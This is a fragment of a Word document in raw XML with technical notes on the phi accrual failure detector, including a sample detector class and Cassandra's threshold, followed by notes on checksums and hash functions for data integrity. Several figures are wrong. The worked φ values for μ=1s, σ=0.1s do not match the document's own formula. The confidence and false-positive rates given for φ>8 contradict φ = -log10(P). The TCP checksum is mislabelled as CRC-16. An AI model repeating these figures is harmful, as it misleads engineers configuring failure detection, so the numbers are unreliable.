    <w:p w14:paraId="1699081D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D90DF1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF87C04" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Maintain: sliding window of last N heartbeat arrival times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BA7866" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Compute: mean (μ) and standard deviation (σ) of inter-arrival times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A9BDD1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E3CFD3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    When heartbeat is due (current_time - last_heartbeat_time &gt; 0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA87D68" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      t = current_time - last_heartbeat_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E001FB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Compute: P_later(t) = probability of heartbeat arriving after t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B8D61E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">               = 1 - CDF_normal(t, μ, σ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFB383C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A90886" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      φ(t) = -log₁₀(P_later(t))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B8D566" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DF5FEE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      If inter-arrivals normally distributed with μ=1s, σ=0.1s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6FF7F1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        t = 1.0s: φ ≈ 0.5 (normal — half the time heartbeats arrive after 1s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887A128" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        t = 1.5s: φ ≈ 2.7 (getting suspicious)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E55BF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        t = 2.0s: φ ≈ 7.0 (very suspicious)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706C4E89" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        t = 3.0s: φ → ∞ (almost certainly dead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DC8EC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E1AF9E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Cassandra configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421B2ED8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    phi_convict_threshold: 8 (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E0E445" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Declare node dead when φ &gt; 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A1EFB3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Corresponds to ~99.9997% confidence node is dead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54758E8D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Expected false positives: 3 per 1,000,000 heartbeat intervals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEAA00C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100ACA9F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Adaptive: automatically adjusts to network conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090BFC93" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    High-variance network: larger σ → higher φ required to reach threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE53978" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Fewer false positives in high-jitter environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA6E90" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Stable network: smaller σ → φ reaches threshold faster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0461B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Faster detection in stable environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1E51B2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78311C56" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19070E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    class PhiAccrualDetector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3068A5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      def __init__(self, threshold=8, window_size=1000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322B6380" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.threshold = threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4594EC02" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.arrival_times = deque(maxlen=window_size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2EDFA4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.last_heartbeat = current_time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A468B65" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5E5C0F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      def heartbeat_received(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE9864" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        now = current_time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F293893" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        interval = now - self.last_heartbeat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C502B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.arrival_times.append(interval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054C69A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        self.last_heartbeat = now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7CD718" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5354A7DB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      def phi(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B86B3A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        if not self.arrival_times:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF674C6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">          return 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEAAE90" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        now = current_time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2537B3F7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        t = now - self.last_heartbeat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FFC2B3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        μ = mean(self.arrival_times)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DD412B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        σ = stddev(self.arrival_times)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D19D6ED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        # Normal CDF complement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235726CE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        p_later = 1 - normal_cdf(t, μ, max(σ, 0.001))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6178651B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return -log10(max(p_later, 1e-300))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CBA675" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BDB4B1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      def is_available(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC9AA24" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return self.phi() &lt; self.threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C90F79F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checksums and Data Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60789914" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>End-to-end checksums — detecting silent corruption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D957A19" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A79BECA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Silent data corruption (bit rot):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B991D94" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Data stored on disk → bits flip over time → corrupt data read without error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C109A91" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Network transmission → packet checksum collision → corrupted packet accepted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406AAC7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  DRAM without ECC → computation error → wrong result stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2891C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE2B178" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  The danger: system believes data is correct, acts on corrupted data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF0835" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AABB42" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Ethernet/TCP checksums: insufficient!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDEC34B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    TCP checksum: 16-bit (CRC-16) over payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF6F8CD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Collision probability: 1 in 65,536 for random corruptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB3A12D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Not designed to catch all corruptions: burst errors, multi-bit, storage errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623AE083" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C3DF07" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Application-level checksums (the real protection):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004FD66E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  CRC-32C (Castagnoli):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1E6FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    32-bit checksum with hardware instruction support (SSE4.2: _mm_crc32_u64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22677E7C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Throughput: 20+ GB/s with hardware acceleration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776C2594" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA9C93" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Collision probability: 1 in 4 billion for random corruptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658565FA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Detects: all single-bit errors, all burst errors &lt; 32 bits,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A618F6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">             most multi-bit errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041879DA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Does NOT detect: adversarial corruption (not cryptographic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A074390" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B7BAF6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  xxHash64:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C4C6D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Non-cryptographic hash, extremely fast (~100 GB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735CE25D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Better distribution than CRC-32 for certain error patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D64F1DC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F6A4D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  BLAKE3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDDC98" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Cryptographic hash: collision-resistant even against adversaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C49E25" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Fast for a cryptographic hash (~8 GB/s on modern hardware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3ACA3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Use when: integrity must hold against deliberate manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3432AFB9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C2320" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  SHA-256:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762C5112" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Standard cryptographic hash for external data and security contexts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2F2690" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ~2 GB/s throughput (slower than BLAKE3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E72214" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221322D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Checksum placement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532CA08B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Wrong: checksum computed over compressed/encrypted data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7217D9CC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Corruption detected after decompression/decryption (late detection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180B5721" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061A55BF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Correct: checksum computed over raw data, stored separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B58422D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Read data → verify checksum → if valid: process data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EF7E41" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
